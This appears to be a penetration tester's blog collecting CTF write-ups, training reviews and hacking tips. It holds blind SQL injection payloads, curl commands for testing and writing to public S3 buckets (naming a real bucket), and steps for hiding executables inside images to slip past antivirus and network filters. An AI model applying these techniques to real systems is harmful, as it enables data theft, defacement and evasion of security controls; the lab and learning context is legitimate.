RabbidByte

The New Phish

2019-06-06T07:00:00+00:00

Microsoft platform for Phishing … Microsoft

Scams and phishing are continually getting more creative, and today I came across one phishing attack that really kinda amazed me. The attack uses a legitimate Microsoft login page that will POST credentials to a malicious server. I have not seen anything like this in the past so I thought that it would definitely be worth looking into.

The attack starts as most do … an email. The subject line is “Unblock Messages for [email address]” and the email claims that the portal (labeled by the email’s domain) has blocked some emails and that the user must release them. The phishing email is not very convincing as it starts with Dear [username] and finishes with Regards, [domain] among other red flags. But the URL is where things get quite interesting.

The initial hyperlink went to https://[redacted]/some/directory/redirect.aspx?url=https://[redacted].z6.web.core.windows.net/?username=anemailaddress The attack initially uses an open redirect vulnerability on a website to push the user to a Microsoft login page. This bypasses most if not all URL rewriting controls on emails and gets the user to the “payload” page.

The login page is crazy neat! It is a real Microsoft login page with an additional gotcha. During the login process it adds an extra POST that sends the entered username and password to the attacker’s server.

Offensive Security AWAE

2019-05-05T07:00:00+00:00

Summary

A few months ago registration for BlackHat USA19 kicked off, and for the third year in a row I just missed getting into Offensive Security’s Advanced Web Attacks and Exploitation (AWAE) training. This was frustrating as hell because I only know of it being offered once a year in North America. The story doesn’t end there though. A couple weeks after the disappointment I received an email from OffSec offering early access to OffSec Alumni to the online version of the AWAE training before it is publicly available! Normally I would be shit outta luck because I don’t really have extra cash laying around for stuff like this but I do work for a kick ass employer who took care of the bill! So it was game on.

March 9th I received my training material and lab access. I was not initially impressed as my last OffSec experience was the PWB training in 2013 and the AWAE lab was much smaller. Don’t judge a book by it’s cover I guess cause the handful of machines in the lab gave me one hell of a good time.

Layout is similar to the PWK (formally PWB) training. You get a PDF textbook, a collection of videos, and access to the lab. In the lab there is a control panel where you can revert your machines, you will need it cause ya pooch em hard sometimes. The main difference with the AWAE was the inclusion of a WiKi in the lab and access to the applications, machines, and source code. I was taken back a bit as I was expecting a blackbox approach to the training but it is completely the opposite. This training is completely based around the idea of whitebox testing.

Content

Introduction

Completely necessary but dry. Just like all housekeeping it has to be done and if ignored the student will not get the full experience from the course. Just read it, pay attention, and take a couple notes of where things are.

Tools & Methodologies

After reading this I thought that the AWAE was going to be a waste of money. Isn’t this supposed to be an advanced class? Ugh, either way they go through BURP Suite, some basic Python with sockets, .NET decompilation, and Java decompilation. Aside from the .NET stuff none of this was new to me but you go through it, and you may or may not learn something new.

Atmail Mail Server Appliance: from XSS to RCE

Finally you get to some fun stuff here. They ease you into the training starting with a basic XSS vulnerability. Then you start to see what will be the trend in the rest of the material. Just because you have a vulnerability that you can exploit, don’t stop until you can get RCE. From the XSS vulnerability multiple examples were given on how to leverage this to further progress deeper into the system. The best part here was creating a PoC that would chain multiple actions together to make a single XSS turn into RCE.

ATutor Authentication Bypass and RCE

You can’t have a web attack class without SQLi … this was the first instance, at least it was blind. The material goes on to touch on input sanitation bypass, data exfiltration, authentication bypass, file upload vulnerabilities, path traversal, and of course getting RCE. The best part of this module was following the source and seeing why the application worked the way it did. Oh and hand crafting the zip payload was just plain old fashioned fun!

ATutor LMS Type Juggling Vulnerability

This is where it got a bit tough for me. Type juggling was something that I have never done and after this training it has opened up a whole new realm of tests that I will be running. Not only was the concept of type juggling introduced to me here but also the concept of magic hashes. Very cool material in this module.

ManageEngine Applications Manager SQLi to RCE

I was not looking forward to having to work with Java applications, just because its unfamiliar to me, but here it was. The content was exceptional though to help with understanding Java web applications. From source recovery, tracking down how to call which servlets, great coverage of postgresql including user defined functions and large objects, input sanitation bypass, multiple ways to exploit the same vulnerability, and one hell of a challenging “Extra Mile”.

Bassmaster NodeJS Arbitrary JavaScript Injection

NodeJS … really? I wanted to punch my LCD. More Java and a bastardized version (according to a Java dev I know) at that. Just more unfamiliar territory for me, but that is what learning is about. This module went by pretty quick though as I am pretty familiar with RegEx and python. Then at the end of the material there is a great “Extra Mile” that took me a very long time to finally crack through. More on the extra mile things below.

Just as soon as I get through all the Java stuff I was uneasy with they through .NET at you. This took me a few read through’s as I was not familiar with deserialization vulnerabilities, other than hearing about them. Not to mention I don’t know as much as I should on how a .NET web application works. This is where the value of the course really started coming out for me. You spend a good portion of your time in Visual Studio with C# and understanding serialization, thank gawd as I really needed it. Once you get a handle on serialization the concept of changing the type is introduced with vulnerable code. Then in true OffSec style you build the payload by hand with really detailed explanations. Then the extra mile …

The Extra Mile

Every concept introduced in the training is followed up with exercises that you complete. Not much different than any other training. They aren’t hard, the answers are pretty much given to you, and are there to re-enforce the concepts presented. Then there are what are called “Extra Mile” challenges. These varied from very “Mickey Mouse” to taking over a week to accomplish. I will highlight the few that stick out in my mind.

Type juggling

This is the first instance in the training where the student is asked to find a vulnerability. Simple hints of where to look are given but that is it. As type juggling was new to me this challenge was interesting but far from a hard challenge. What it did do for me was really drive home the concept of type juggling and improved my ability to follow through code looking for potential vulnerabilities.

ManageEngine JSP

This challenge was definitely just that for me, a huge challenge. I followed many red herrings trying to exploit the system using a JSP payload but time after time it just wouldn’t work. I ended up finding some other students chatting about this and getting a hint from the conversation. It then took me a couple days to finally pull the exploit together. This was a great challenge making the student think of alternative ways of doing things and chaining multiple “steps” together to obtain full RCE.

NodeJS Jailbreak

How could I forget this one. It took me over a week to finally crack this bad boy. Why, most people will ask. Well let’s just say that even if you have a working exploit and it is coded perfectly the delivery of the payload makes all the difference. I’m still kicking myself in the ass for this one. Either way in the end it was really great and I came away with a pretty good understanding of “Context” in NodeJS and how to reach up through the process stack to get what you want. I am sure that doesn’t make sense to anyone who hasn’t done this challenge.

.NET Deserialization

I was running out of lab time. I asked my family to give me the weekend to work on this challenge and the final remaining one. I was able to get through it in just over 10 hours of straight pounding away. Basically OffSec “introduced” a secondary .NET deserialization vulnerability into DNN. Yeah that’s basically what you were told, go find it, and exploit it. Hands down the hardest part for me was finding the vulnerability but detail-oriented people will find the same “clues” that were there to help you. I’ll tell ya I was jumping around when I finally popped this shell. What a great challenge!

Java Deserialization

I have this one in here as it was the final challenge in the training and it had an interesting twist. Although deserialization vulnerabilities were covered it was all done in .NET. This challenge has you go back to ManageEngine and find the Java Deserialization vulnerability and exploit it. This was crazy fun and now that the pressure was off of me to complete the training in time I spent hours making a fully automated PoC in python that was multithreaded and handled everything for the attacker. This was just plain fun and a great way to end the training.

Where Offensive Security got it Right

The material is very in-depth, and I love how it walks you through the code step by step so you understand why web applications work the way they do.
Even though it made me uneasy the training wouldn’t have been the same without touching every different backend technology from PHP, JAVA, NodeJS, .NET, and various different database technologies.
The “Extra Mile” challenges make this true OffSec training and they make you “Try Harder”. Once a student accomplishes these challenges they have a feeling of accomplishment and have went out and studied the technology/vulnerability on their own.

Where Offensive Security got it Wrong

I was in the Beta version of this training, so I am sure that the grammar in some of the extra mile challenges will be corrected. There was confusion on what exactly some of the challenges were asking of the student.
At certain points of the training the student is forced to work on a windows machine in the lab through RDP. These were slow most times I was on them and I can’t count the number of times I ran out of memory while debugging DNN.

Final Verdict

Offensive Security training has always been hands down HARD the absolute best security training I have ever received. You don’t just read and do exercises. You are forced to understand the concepts to complete the extra mile. If any student says that the AWAE training is not worth while they are either 1. Way smarter than I am (it doesn’t take much) or 2. They did not attempt the extra mile.

Hacker0x01 50m_ctf

2019-03-27T07:00:00+00:00

Introduction

So I have never done write-ups for CtF’s before but I am taking the information that I have and putting it all together in some posts. This post and CtF posts before this date are going to be lacking as I never intended to write them up for a blog so don’t be suprised when they don’t meet your expectations.

Summary:

Discovery of the application:

The h1Thermostat application was discovered by extracting the bit.do URL from the image at https://pbs.twimg.com/media/D0XoThpW0AE2r8S.png:large. The URL https://bit.do/h1therm then led to a Google Drive where the Android application file (h1thermostat.apk) could be downloaded https://drive.google.com/file/d/1u5Mg1xKJMrW4DMGaWtBZ1TJKPdvqCWdJ/view.

Disassembly of the APK

The file h1thermostat.apk was loaded into the Android SDK for analysis. The thermostat application requested a username and password to access the services. The APK code was extracted and it was found that the system would proceed past the login screen if the server responded with ”success”:true in a JSON object.

Use of default/weak administrative credentials:

The thermostat application was loaded into the Android SDK and executed. When the application started it requested a username and password to access the services. The application accepted the credentials:

Username: admin

Password: password

Although some luck is involved in guessing this username and password combination it can easily be automated as there is no rate limiting or account lockout enabled on the application.

SQL Injection Vulnerability

Looking into the APK code further using jadx-gui the LoginActivity class calls the PayloadRequest class when a user signs in. The process takes the username and password and combines it with a command field in a JSON object. The login JSON object contains the username, password, and command field.

({“password”:”password”, “username”:”admin”,”cmd”:”getTemp”})

This text string is then encrypted with AES/CBC/PKCS5 and then ran through a base64 encoder. The server (35.243.186.41) then checks the credentials and replies with an encrypted JSON object

({“success”:true,”temperature”:73})

It was found that the field “username” in the JSON object was vulnerable to an SQLi attack. A custom Java application was written that would create a JSON object with the desired fields filled in and parse the server’s response. The SQLi vulnerability was blind, meaning that inference was needed to determine what was happening on the server side. It was found that when the success field in the JSON object was true the SQL query completed successfully. When the query was incorrect and failed the sever responded with success as false and the error was “Unknown”. Finally, if the query completed successfully but it returned 0 rows, success would be false and the error that was returned is “Invalid username or password”.

Using the different error messages returned by the server the SQLi vulnerability could be exploited to dump contents from the database. A custom Java application was written to pull the information out of the database using the following queries with the password of “password”:

admin' AND user() LIKE ‘%’;--
admin' AND (database()) LIKE ‘%’;--
admin' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1 OFFSET 1") LIKE '%’;--
admin' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 1 OFFSET 1) LIKE '%’;--
admin' AND (SELECT password FROM users LIMIT 1 OFFSET 0) LIKE '%’;--

The Java application would cycle through every printable character until a right answer was found. Once the first character was found the next character would be attacked. This would continue until the end of the string.

Information Disclosure:

The users table holds a single record. The id is 1, the username is admin, and the password is 5f4dcc3b5aa765d61d8327deb882cf99. It was found that the data stored in the password field is an md5 hash of the word “password”. If there were more accounts stored in the table these could easily be reversed using various methods.

Once the devices table was dumped it was found that all IP addresses in the devices table were in reserved blocks and unrouteable. These addresses fell within the following ranges except for the record with the id 85.

10.0.0.0–10.255.255.255
100.64.0.0–100.127.255.255
127.0.0.0–127.255.255.255
169.254.0.0–169.254.255.255
172.16.0.0–172.31.255.255
192.0.0.0–192.0.0.255
192.0.2.0–192.0.2.255
192.88.99.0–192.88.99.255
192.168.0.0–192.168.255.255
198.18.0.0–198.19.255.255
198.51.100.0–198.51.100.255
203.0.113.0–203.0.113.255
224.0.0.0–239.255.255.255
240.0.0.0–255.255.255.254
255.255.255.255

The record with the id “85” in the devices table had an IP address of 104.196.12.98. This was the only accessible IP address in the table. When the address was visited with a web browser it displayed an administrative login page for “FliteThermostat”.

shitty image from cellphone, sorry.

Timing Attack:

The JavaScript used to send the username and password from the webpage to the server took the user inputted values and combined them with the hex characters ‘\x05\x00\x06’ between the two values. Once this string was created it was ran through a custom “hashing” function and sent off to the server for authentication.

It was found through running a dictionary type attack that some responses from the server were much slower than others. This indicated that the hash could be cracked using a timing attack (and a helpful push in the right direction by 0xc0ffee).

The hash was broken by brute forcing the string by two hexadecimal characters (1 byte) at a time and observing response times from the server. The longer response time that was received it was determined that the more likely the two characters were the next in the series of the string. The attack started with a series of 64 “0”’s and was brought down to the actual string using the response times from the server. After all 255 possible combinations were sent to the server the top 10 – 15 strings were replayed to eliminate false positives. When the string was found to replicate the same response time the process was started again on the next two characters.

The best results were found to be from a virtual machine replaying the POST with Burp although very slow. Settings were configured to only a single thread with 25 milliseconds for throttle. Once again this could be made more difficult by adding a rate limiting or account lockout control within the system.

f9865a4952a4f5d74b43f3558fed6a0225c6877fba60a250bcbde753f5db13d8

The hash was then sent to the server and the response gave a redirect and a Session ID. The session ID was added to a browser with the console command

javascript:void(document.cookie=-“SessionID=valuereturnedbyserver”);

and this enabled access to the web application showing the pages: control, main, update, and diagnostics.

another shitty cellphone picture, sorry.

Thermostat Update Page:

The thermostat page was intended to download and install updates for the application. It was found that the port where the server was sending requests to could be changed by sending the parameter PORT=[port#] in the URL. After a portscan of 65,535 ports on the system and multiple other attempts I ran out of time here.

This CtF was amazing and I would like to thank everyone who helped build it! I learnt so much in this experience including probably the most important lesson of not jumping on the first vulnerability and thinking it is the end. This will help me in future CtF’s and more importantly in bounty hunting.

The CtF Source

https://github.com/Hacker0x01/FliteCTF

Better Write-Ups than mine

KringleCon 2018

2019-01-04T07:00:00+00:00

Summary

SANS puts on KringleCon and I have to say not only was it fun but some of it really made me think. I made it to the end of this one but yet once again … I am writing this way, way after it has been completed so the content is going to lack. Sorry in advance.

So some of the “challenges” that were in KringleCon were trivial and I never took notes thinking that I was never going to write about it. So looking through what I do have saved I will just give some quick summaries on what I have.

Nope. I just looked at the files again, and there is going to be no way I can put this one back together. So I will give a list of the challenges that I recorded and some images. This write up should go down in history as the worst, oh well.

Bloodhound
Dev Ops Fail
Elf InfoSec
Encrypted Zip
Google Vent
LethalForensicELFication
Packalyzer – I got nothing but I remember that this drove me crazy … I do have a very cryptic txt file … perhaps this is the lesson to take better notes?
Piano
Python Jail
Scan-o-matic
Sleighbell
Snort
Stall Mucking
Vi – REALLY … WTF?!
Webcall
YuleLog

Results

Basically I finished … that’s it. Plus one really painfull writeup, sorry.

Metasploit/Rapid7 CtF: 2018

2018-12-05T07:00:00+00:00

Summary

This was the first CtF that I participated in that I actually kept files for. This was don back in late 2018 and here I am almost 4 months later trying to write about it … yeah this will not be pretty. Either way Metasploit / Rapid7 put on this CtF that you had to register for and basically were let loose trying to find images of playing cards. Once you found a card the MD5 hash of the image was the flag. Simple right? Well I did not have nearly enough time to dedicate to this one. I spent a whopping 3 days, which were not full days, trying to finish this and didn’t get far at all. So let me just quickly describe what I did end up finding and my results.

3 of Clubs

This one was a “give me”. Basically, all you had to do was read the rules of entry on the website. This being my first CtF I read them just to make sure I knew what I was actually supposed to be doing. At the end of the rules you found the following:

Thanks for actually reading our terms of service. As a show of our gratitude, please find your splendiferous reward by pointing a web browser to your Linux host on port 31063.

Yeah it was that easy … that’s the 3 of Clubs.

3 of Diamonds

What would a CtF be without at least one SQLi vuln right? Well this was one I found. It was pretty easy to be honest. Just sqlmap it and the key was sitting in the table. Enter the key into the website and you got your flag … at least I think. Either way that’s how I remember it.

10 of Hearts

This flag was found by first port scanning the Linux machine. On TCP:8080 there was a running Apache Struts instance. A little poking and prodding (remember I am writing this like 4 months later) we find that it is Struts 2.3. Well Metasploit has an exploit for that … go figure right, who made this CtF?

Using exploit/multi/http/struts2_code_exec_showcase you were able to pop a shell with a reverse bash payload. Once you were in the system it was time to hunt for the flag. Eventually I found the flag under /usr/local/tomcat/tmp.

My Ranking

Pretty lame but expected for the amount of time I put into it.

Hacker 101: CtF Series

2018-11-01T07:00:00+00:00

Summary

Hacker0x01 has a great CtF series that is just perfect for practicing. Although it would not be fair to release findings as there are h1 private invites being awarded for the completion of the challenges, I did think that it would be fine to make a public listing of my progress. Below is a list of the CtF’s and my status.

A little something to get you started
Difficulty: Trivial
Flags: 1/1
Micro-CMS v1
Difficulty: Easy
Flags: 4/4
Micro-CMS v2
Difficulty: Moderate
Flags: 3/3
Encrypted Pastebin
Difficulty: Hard
Flags: 4/4
Photo Gallery
Difficulty: Moderate
Flags: 3/3
Cody’s First Blog
Difficulty: Moderate
Flags: 3/3
Postbook
Difficulty: Easy
Flags: 7/7
Ticketastic: Demo Instance
Difficulty: Moderate
Flags: 0/0
Ticketastic: Live Instance
Difficulty: Moderate
Flags: 2/2
Petshop Pro
Difficulty: Easy
Flags: 3/3
Model E1337 - Rolling Code Lock
Difficulty: Hard
Flags: 0/2
TempImage
Difficulty: Moderate
Flags: 2/2
H1 Thermostat
Difficulty: Easy
Flags: 2/2
Model E1337 v2 - Hardened Rolling Code Lock: Expert
Flags: 0/1
Intentional Exercise: Moderate
Flags: 1/1
Hellow World!: Moderate
Flags: 1/1
Rend Asunder: Expert
Flags: 0/3
BugDB v1: Easy
Flags: 1/1
BugDB v2: Easy
Flags: 1/1
BugDB v3: Moderate
Flags: 1/1

AWS S3: Misconfiguration, Discovery, and Abuse

2017-06-20T07:00:00+00:00

Summary

Recent news of the Verizon data leak http://www.darkreading.com/cloud/verizon-suffers-cloud-data-leak-exposing-data-on-millions-of-customers/ and a similar scenario concerning Dow Jones http://www.darkreading.com/cloud/dow-jones-data-leak-results-from-amazon-aws-configuration-error/ prompted me to do a little “poking around”. The basic misconfiguration in these cases was that the administrators of the AWS S3 buckets permitted read access to “Everyone” from anywhere. So really all someone had to do was find the S3 bucket and take whatever they wanted. The interesting thing is that AWS has changed the ACL configuration on S3 buckets pretty much right after the news of Dow Jones hit the main stream media.

I started to think a little bit about this situation. If administrators make the mistake to leave sensitive information out on S3 buckets with anonymous read access could they make bigger mistakes? What if an administrator left an S3 bucket open with anonymous read/write access? All that someone would need to do is find the bucket, see if they could write to that bucket, figure out what it is used for, and then manipulate content for fun/profit.

FYI – I will not post my code for bots/spiders

Find S3 Buckets (one way out of many)

Going through the net finding S3 buckets and testing them is painfully tedious if done manually and you would probably never find anything of use. You have to automate this process and the way I would go about doing this would be by creating a Spider.

Create a simple spider that wonders through the web looking at the source code of webpages that have the following ‘src=’ tags. *.s3.amazonaws.com *.s3-[aws regions].amazonaws.com

Once the spider finds these URLs in the SRC tags have it dump the value, along with the page’s URL to a log file after checking for duplicate entries. That’s it … you found an S3 bucket … whoopee, note sarcasm

If you need help building a bot or spider pick up a book and learn. I recommend this one https://www.amazon.com/Webbots-Spiders-Screen-Scrapers-Developing/dp/1593273975/

I will use CNN.com as an example. I found on the main page the S3 bucket http://s3.amazonaws.com/cnn-sponsored-content

Check for Write Permissions (2 different ways)

Get the ACL

curl [s3 bucket url]/?acl

Probably the easiest and most detailed way to see if you can get anonymous write access is by reading the ACL. This has its drawbacks though as administrators could misconfigure the ACL for the bucket objects and have no access to read or write the ACL. In this case the bot would show that access is denied.

The example from CNN.com gives us the ACL because “Everyone” has access to read the ACL (READ_ACP). You can see this listed at the bottom of the server’s response.

<URI>http://acs.amazonaws.com/groups/global/AllUsers</URI></Grantee><Permission> WRITE</Permission>

Again we don’t want to have to go through all of this manually … you got a puter … use it. Write a simple script to monitor the log file for new entries. When a new S3 bucket URL is written to the log file the script just needs to request the ACL and check for write access. This can all be done with a combination of (you don’t need them all really) curl, grep, awk, and xmllint. Don’t know how to do it? Try google, I really do not want to provide all information for someone to launch a potentially malicious bot/spider.

Just Try to Write to the Bucket

Another way to test to see if you have write access to an S3 bucket is just to write to it. Create a simple txt file with a couple characters in it. Then use curl to upload it to the S3 bucket. If the connection ENDS with an HTTP/1.1 100 Continue then you have write access to the bucket.

curl -v -H acl=public-read -H key=test.txt -T test.txt http://s3.amazonaws.com/cnn-sponsored-content

Abuse: What Does the Bucket Contain

This is where it gets a tad fun. So lets say that CNN had all their videos for their website hosted in an S3 bucket called cnn_video and we successfully wrote to http://s3.amazonaws.com/cnn_video Well if you have write access in S3 you also have delete access (at least it seems that way in my testing).

So if the video http://s3.amazonaws.com/cnn_video/main.mp4 was linked in www.cnn.com/index.htm then all an attacker would have to do is use the AWS REST API to delete (http://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectDELETE.html) the video in the bucket and replace it with whatever other video they wanted (just named the same). The attacker now has their video posted on CNN … hypothetically of course.

Note:

All CNN links with the exception of the one S3 bucket are fictional
Yes, this was written quickly
Yes, this is incomplete
No, I will not give you the code for my spider

HackRF: The easy way

2016-04-01T07:00:00+00:00

The Story

Recently many different radio hacks (mousejack, drone hijacking) have hit the internet. This has spurred my interest in analogoue and digital radio. After some bindge shopping on the internet and a few days wait I have had some very nice toys show up. Once the new electronics smell and novelty of a new toy had worn off the frustration kicked in.

RTL-SDR is a dirt cheap way to start playing with radio using the RTL2832U chipset. I like to do things right when I start a project so I decided to purchase a nice SDR hardware transciever that would provide all the functionality needed without breaking the bank. Enter the HackRF One from Great Scott Gadgets.

Now wanting to get up and running with this device ASAP I followed the recommendation from Michael Ossmann https://greatscottgadgets.com/sdr/1/ and downloaded Pentoo Linux. This distro with the disposable laptop that I had dedicated to radio caused ALL my frustration. First off new inexpensive laptops now all come with Windows 10 … I like to keep that around for convenience. So I shrunk the partition and started the install of Pentoo. Now this HP laptop has the WORST BIOS I have ever come across. The ability to enable legacy booting is there but it lacks the option to set priority between UEFI and Legacy. Solution: Troubleshooting reboot to UEFI device from Windows EVERY TIME, then crash the boot process with USB drive, then the BIOS will let you select an OS from the MBR … so bloody painful!

Finally I am logged into Pentoo … no network … and video keeps crapping out. I felt like I was working on a linux system back in 1999 hunting for drivers. Let’s make this part of the story short shall we? After about 5 hours of messing with this crap Gentoo distro and not being able to get openGL running right I almost chucked the laptop across the room. Why spend all this time trying to make a piece of junk like Gentoo working when the time could be spent building a proper box with support for HackRF?

ENTER Fedora 23, yes I would much rather run RedHat however I am too cheap to pay for a subscription. I could not believe how streamlined it is to get HackRF going in Fedora so I decided to write this to save others time and pain with a crappy ass Gentoo distro. Oh and did I mention that Fedora 23 has UEFI support? Makes everything so much nicer.

This is not the officially recommended way to install gnuradio. I encountered issues with PyBOMBS and version numbers. This supposedly was fixed https://github.com/gnuradio/pybombs/pull/246 although it didn’t work for me. I decided to go with dnf and see what I could do with the repositories and was pleasantly surprised.

My recommendations for HackRF One: ..* DON’T use Pentoo ..* Screen shots and build done on a VM, don’t do this. Load onto your hardware so that you can take advantage of the high USB speeds of the HackRF One ..* Install gqrx with Fedora. Not needed but very useful.

BUILD

Perform a normal installation of Fedora 23 Workstation

Open the CLI and run the following:

sudo dnf update

sudo dnf install kernel-devel-4.2.3-300.fc23.x86_64

(Most likely not needed but I had to install to compile the VM additions)

sudo dnf install gnuradio

sudo dnf install gr-osmosdr

sudo dnf install gqrx

hackrf_info

(Used to check if all is good)

You are done … yup that’s it. Way easier than Pentoo.

Additional Reading

The Hobbyist’s Guide to the RTL-SDR: Really Cheap Software Defined Radio

A Software-Defined Radio for the Masses, Part 1

ECE 4670 Spring 2014 Lab 6 Software Defined Radio and the RTL-SDR USB Dongle

Transfer Any Binary into a Protected Network

2013-06-24T07:00:00+00:00

Summary

Well this is another old trick that still works today. It still gets past all edge security and antivirus … well that is until you pull the executable out again. I find myself using this trick when I need to bring penetration testing tools into a network. Most of the time antivirus or edge security devices will stop the transfer of these executables. So what can you do to get them in?

The first is very obvious, just zip them up and encrypt them. This will get the package into some networks but not all. Many networks now configure edge devices and email security systems to block and/or alert on encrypted attachments. This would probably blow your cover and game over.

Another way to get executables into networks is by using a system called TransHex written while I was running essentialexploit.com. As of now this has not been released but it will be very soon (update TransHex is now released). This application requires a web server on the internet that dynamically converts binary to hex and then gives you a text file that you can download. Once you have the text file the TransHex client will put that back into a binary for you.

The simplest way to get an executable into a network is to email it or just download it. However as we mentioned earlier most edge devices will stop the download and alert the admins. Not something that you want to have happen, however with a little prep you can hide any binary into another file and just bring it on into a network. Here is how it works.

How To Do It

You must know beforehand which executibles you want send. This is the downside. If you forget about a program that you need you will have to have access to the outside system again to send it. Sometimes this could delay your penetration testing by quite a few hours, and sometimes it is not a problem at all. So here’s what you do.

On an external windows system take a harmless picture file and your executable and drop them in the same folder so that it’s easy to work with them
Compress your executable (no encryption needed) into a zip file
Open up a windows command prompt
Navigate into the folder where your files are located
Run – copy /B [image file] + [zip file] [new image file]
Now there is a new file in your folder that looks exactly like your original image
This new file is the image file with the zip in binary appended to the end of the file
Now send this file into the protected network either by email, http … whatever
On the internal windows system open up 7zip
Under “File” select “open” and find your image file
Once 7zip opens the image … you see your package! Extract it and away you go, but beware of local antivirus because once the exe is extracted it will most likely be scanned.

Images From Testing

The command

The files

Scan the attachment (just to show that it was malicious)

Scan the malicious image

Extracting the package from the image

Offensive Security PWB (OSCP) - A Review

2013-05-29T07:00:00+00:00

Summary

Reposted from another one of my blogs

Let’s start off on the right foot shall we? I don’t want to be rude but – I am a computer geek, my writing skills are not so great. So if you don’t like the way I write just quit reading. So let’s get on with the story shall we?

2013 was just starting and every year I have the opportunity to request training from my employer so I went out in search for a challenge. In 2012 I received the CISSP certification and after reading all the horror stories about the exam on the internet I was not impressed. For someone with a diverse technical background the CISSP was “Mickey Mouse” and pretty much a cake walk. Don’t get me wrong I am quite proud to call myself a CISSP but I wanted a challenge … something that didn’t just take time and effort, but something that would drag my mind through hell. I found this challenge in the form of the Offensive Security PWB course and OSCP challenge.

In The Beginning

Once I decided that the PWB course was my training for the year I had to research the training, Offensive Security, and write a proposal so that the funds for the course could be approved. Offensive Security was no stranger to me, I have been using BackTrack since the days of version 2 and it has been my Linux distro of choice since for pentesting (Currently Kali has been released). Any group that could put out a distribution like BackTrack definitely could teach me something.

The PWB course on the other hand was more difficult to put into terms for management. Going through review after review of the training and challenge I found terms like “sleep deprived”, “frustrated”, and “hellish” repeated over and over again. I thought they were all over exaggerating and it was the same story as the CISSP. Wow was I ever wrong.

So the proposal was written, funds were approved, and I wasted no time to sign right up and get started. The registration and payment process I remember was quite odd and did not flow very well. Offensive Security does not use fancy web pages for account creation, management, and credit card processing. Why? Obvious I thought, why expose that type of thing to the internet with a static URL if you don’t need to. I thought that it was a very smart move, but still I was frustrated a bit going through the process.

Then the material showed up. Excitement rushed through me and I dug in right away. The table of contents in the pdf gave me the impression that it wasn’t going to be that hard. I know my programing skills are far from good, but hey how hard could this really be?

I read through the lab guide and watched all the videos. The quality in the material was definitely there. For the cost of the course at this point I was thinking that the labs had to be a joke. I pretty much already got my money worth out of the training. Considering how other similar courses cost 2 times as much or even more.

The Lab

Back to the beginning of the guide I went to start working through the exercises, attacking boxes, and recording findings. The VPN to the lab is amazing, the high speeds and reliability couldn’t have been better. However other students reverting boxes on you when you’re just about to crack a system was quite frustrating.

My first sweep of the lab … This can’t be right. Ping sweep again. Holly crap, this lab is huge! The first part of the lab had 35 machines waiting to be attacked! And this was only 1 of 4 networks in the lab. I couldn’t believe it, I definitely had my work cut out for me. Later on I found that the other networks were smaller consisting of 4 – 10 machines each. Offensive Security definitely did an outstanding job creating this hacking utopia.

Boxes started to fall left and right. I am pretty good at this I thought. Metasploit here, MS06-086 there, and a quick meterpreter “getsystem” (my biggest mistake and regret). Easy. Maybe this isn’t going to be such a challenge. Well that was the beginning, the low hanging fruit quickly fell and the frustration set in. Some boxes just were not going down without a fight. 2 days passed without rooting another box … then another 3 days. What am I doing wrong I thought. I needed help.

IRC (haven’t used it in so long but it was good to be back) communication to Offensive Security staff is provided with the PWB course so I thought that now would be a great time to try it out. Needless to say you know where this is going if this isn’t the first PWB review you’ve read.

Me > ping op
[some op] > pong Me
**go into private messaging**
Me > am I doing something wrong?  I have tried every exploit on [insert any machine name here] and nothing is working.  Can you help me?
[some op] > try harder

WTF!? really, no shit. Well if that aint just a kick in the ass. Makes your frustration level go straight through the roof! You cave, admit that you need help, you go ask for it and you get “try harder”. This was the first time I got this response and definitely it was not the last. Why would “teachers” do this to a person I thought. Well I learnt through the “try harder” process that it is the best way to learn. Don’t get me wrong it’s also the most frustrating way to learn.

Let’s put it this way. You want to learn how to do something. So you go ask your buddy to teach you. He/she shows you exactly step by step how to accomplish the task. Great, you know how to do it. Now don’t perform that task for a year, do you still remember how to do it? With the “try harder” approach, lessons that you learn through frustration, tears, and pure agony stay with you. I will NEVER forget the lessons that I learnt through Bob, Carrie, and that stupid freakn’ OTRS box. So basically try harder = An op not trying to piss you off, but helping you to learn the lesson, not the solution.

The United Students of Offsec

As much as try harder was working for me it didn’t solve all my issues and I was quickly seeing my 90 days of lab time run out. Who can help me out? My friends and co-workers either don’t have the time or knowledge to help me. Crap! I can foresee myself not completing the lab. Wait this is 2013, communication globally has never been easier. Off to Twitter I went and basically sent out a distress signal with some hash tags and prayed for a response. I also responded to another student’s distress signal.

I quickly found out that my feelings of hopelessness were shared amongst others within the PWB community. Emails started flying back and forth and information was being shared. Don’t misunderstand this. We were sharing information not giving answers away. At this point we were all trained in the “try harder” methodology and were not about to break it. You work extremely hard to get some boxes and you just aren’t about to give it away.

We the students were united in our common goal to take down every single system in the lab.

Along with IRC Offensive Security also provides students access to an online forum. These forums are full of great info. You know the normal stuff “Bob is laughing at you”, “try harder”, and then the helpful information. However being regulated by Offensive Security I don’t think that you will find any good hints or solutions to the labs in there. Again it’s about learning the lesson and not achieving the goal.

Lab time was coming to an end and I had my challenge already booked. Just a few days left and I decided to quit working in the lab and get the lab report completed. I felt horrible. I was unable to get Pain, Sufferance, and Jack (in the admin lab). What a ride, and it wasn’t over yet. With the challenge that weekend I couldn’t waste time worrying about what I didn’t do. Over the 90 days I learnt a lot and achieved quite a bit.

The Challenge

The OSCP challenge is a 24 hour test of what you have learnt. You are given access to a new lab that the student has no previous knowledge of and they are challenged to gain administrative access to the 5 machines in 24 hours. Machines are rated at different point levels and points are gained when access is obtained by the student. To pass the challenge a total of 70 points must be achieved out of a possible 100. When the 24 hours is up the student then has another 24 hours to write the report in the format of a pentest report and submit it to Offensive Security. Oh and there is one catch … remember way back at the beginning of this write up my biggest mistake and regret in the lab? You guessed it. You can’t use metasploit in the challenge (with some exceptions, it is laid out quite nicely in the challenge package).

7:00 AM on Saturday May 4th 2013 I am sitting at my desk waiting for my exam package. Nothing. 7:05 .. 7:15 still nothing. What the hell? Yeah so long story short I screwed up with the time zones and booked my exam for 8:00 AM. Even worse I did this again scheduling the next exam as well.

Finally I get the exam package and I am off to the races. I had no plan, no schedule, and no idea what I was going to do. Worst battle plan ever. So yeah lets sum up this challenge attempt to WTF Why Did I Show Up?

I worked from 8AM to midnight straight with no breaks. Then I gave up. I was beat, and there was nothing else left in me. Only one box rooted and 2 limited shells. I knew right away there was no possible way I passed. I went home defeated, feeling like crap … a failure. I whimpered to myself a little before I went to bed and then raised the white surrender flag. I had no intension to wake up and try any more.

